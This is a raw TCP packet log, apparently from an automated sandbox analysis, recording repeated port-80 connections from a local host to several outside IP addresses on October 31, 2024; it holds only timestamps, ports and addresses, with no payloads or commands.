                                                                                                                                                                              Oct 31, 2024 01:39:07.529956102 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:07.607846022 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:07.686428070 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:07.686482906 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:08.139261007 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:09.157320023 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:09.162170887 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:09.165122986 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:09.170979023 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:09.175872087 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:10.080965996 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:10.123445988 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:10.243415117 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:10.243580103 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:10.244267941 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 31, 2024 01:39:10.249007940 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:15.275724888 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:15.280498981 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:15.280563116 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:15.292696953 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:15.297569036 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:15.979545116 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:15.979830980 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:15.979872942 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:16.799107075 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:17.814197063 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:17.819067001 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:17.819135904 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:17.833415031 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:17.838224888 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:18.537484884 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:18.539549112 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:18.539675951 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:19.342292070 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:20.360301018 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:20.365144968 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.369105101 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:20.378134012 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:20.382989883 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383009911 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383018017 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383052111 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383060932 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383196115 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383258104 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383266926 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:20.383275032 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:21.055593967 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:21.058229923 CET8050030172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:21.058398008 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:21.889137983 CET5003080192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:22.926022053 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:22.931916952 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:22.932271957 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:22.943212032 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:22.948008060 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:23.643114090 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:23.645469904 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:23.645577908 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:23.646559954 CET5003180192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 31, 2024 01:39:23.651339054 CET8050031172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:30.662180901 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:30.667073965 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:30.671405077 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:30.682261944 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:30.687091112 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:31.629831076 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:31.671886921 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:31.812640905 CET805003220.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:31.812700987 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:32.186063051 CET5003280192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:33.207057953 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:33.211913109 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:33.215488911 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:33.235064030 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:33.239959955 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:34.175077915 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:34.217232943 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:34.358156919 CET805003320.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:34.365041018 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:34.743256092 CET5003380192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:35.751882076 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:35.756712914 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.756782055 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:35.768433094 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:35.773335934 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773345947 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773391962 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773401022 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773407936 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773541927 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773550034 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773576021 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:35.773583889 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:36.709728956 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:36.767358065 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:37.089571953 CET805003420.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:37.092521906 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:37.280531883 CET5003480192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:38.298794985 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:38.303556919 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:38.303735971 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:38.311378956 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:38.316374063 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:39.232633114 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:39.279820919 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:39.405924082 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:39.406001091 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:39.407470942 CET5003580192.168.2.420.2.249.7
                                                                                                                                                                              Oct 31, 2024 01:39:39.412362099 CET805003520.2.249.7192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:44.935095072 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:44.941014051 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:44.941139936 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:44.955065012 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:44.960100889 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:45.613501072 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:45.651396990 CET8050036203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:45.651484013 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:46.469077110 CET5003680192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:47.487032890 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:47.491899014 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:47.491972923 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:47.505494118 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:47.511357069 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:48.200424910 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:48.238708973 CET8050037203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:48.238766909 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:49.017106056 CET5003780192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:50.034291029 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:50.039251089 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.039349079 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:50.050745964 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:50.055604935 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055623055 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055639029 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055646896 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055669069 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055809021 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055816889 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055845976 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.055855036 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.722810984 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.762703896 CET8050038203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:50.762782097 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:51.561249018 CET5003880192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.581082106 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.586108923 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:52.593122005 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.597141981 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:52.601978064 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:53.275543928 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:53.314136028 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:53.314383030 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:53.317055941 CET5003980192.168.2.4203.161.49.193
                                                                                                                                                                              Oct 31, 2024 01:39:53.324616909 CET8050039203.161.49.193192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:58.403058052 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:58.407861948 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:58.409137964 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:58.421084881 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:58.425920010 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.066325903 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.066339970 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.069159031 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:59.098050117 CET8050040199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:39:59.101115942 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:39:59.920492887 CET5004080192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.940011978 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.945347071 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:00.945492029 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.955265045 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:00.960361004 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.570861101 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.570873976 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.570939064 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:01.571190119 CET8050041199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:01.571234941 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:02.469161987 CET5004180192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.486982107 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.492186069 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.492249012 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.508836985 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:03.513741970 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513752937 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513787985 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513798952 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513808012 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513946056 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513955116 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513991117 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:03.513998985 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.158436060 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.158530951 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.158592939 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:04.190339088 CET8050042199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:04.190391064 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:05.014240026 CET5004280192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.059575081 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.064516068 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.064579010 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.120237112 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.125144958 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.732575893 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.732595921 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.732795000 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.764544964 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:06.764648914 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.767209053 CET5004380192.168.2.4199.59.243.227
                                                                                                                                                                              Oct 31, 2024 01:40:06.773153067 CET8050043199.59.243.227192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.023252964 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.028553009 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.028614044 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.043965101 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.048957109 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916357994 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916606903 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916616917 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916621923 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916631937 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916641951 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916654110 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916665077 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:12.916688919 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.916765928 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:12.916765928 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:13.056739092 CET8050044217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:13.059407949 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:13.545542002 CET5004480192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.617553949 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.622447968 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:14.623666048 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.667103052 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:14.671919107 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514626026 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514656067 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514667034 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514676094 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514688969 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514697075 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:15.514710903 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.514712095 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:15.514755011 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:15.654714108 CET8050045217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:15.654753923 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:16.170650005 CET5004580192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.191380978 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.196295977 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.199455023 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.211189985 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:17.216026068 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216037989 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216042995 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216052055 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216075897 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216314077 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216321945 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216330051 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:17.216340065 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.090936899 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.090948105 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.090960979 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.090966940 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.090972900 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.090977907 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.091100931 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.091147900 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.091170073 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:18.091250896 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:18.231506109 CET8050046217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:18.231703997 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:18.719357967 CET5004680192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:19.737814903 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:19.742621899 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:19.742692947 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:19.751441956 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:19.756294966 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.624912977 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.624928951 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.624938011 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.624989033 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.625000954 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.625010967 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.625049114 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:20.625296116 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:20.764414072 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:20.764806032 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:20.767126083 CET5004780192.168.2.4217.76.156.252
                                                                                                                                                                              Oct 31, 2024 01:40:20.771868944 CET8050047217.76.156.252192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:25.822711945 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:25.827552080 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:25.827657938 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:25.839320898 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:25.844218016 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:26.690713882 CET8050048144.76.190.39192.168.2.4
                                                                                                                                                                              Oct 31, 2024 01:40:26.733225107 CET5004880192.168.2.4144.76.190.39
                                                                                                                                                                              Oct 31, 2024 01:40:26.825839996 CET8050048144.76.190.39192.168.2.4
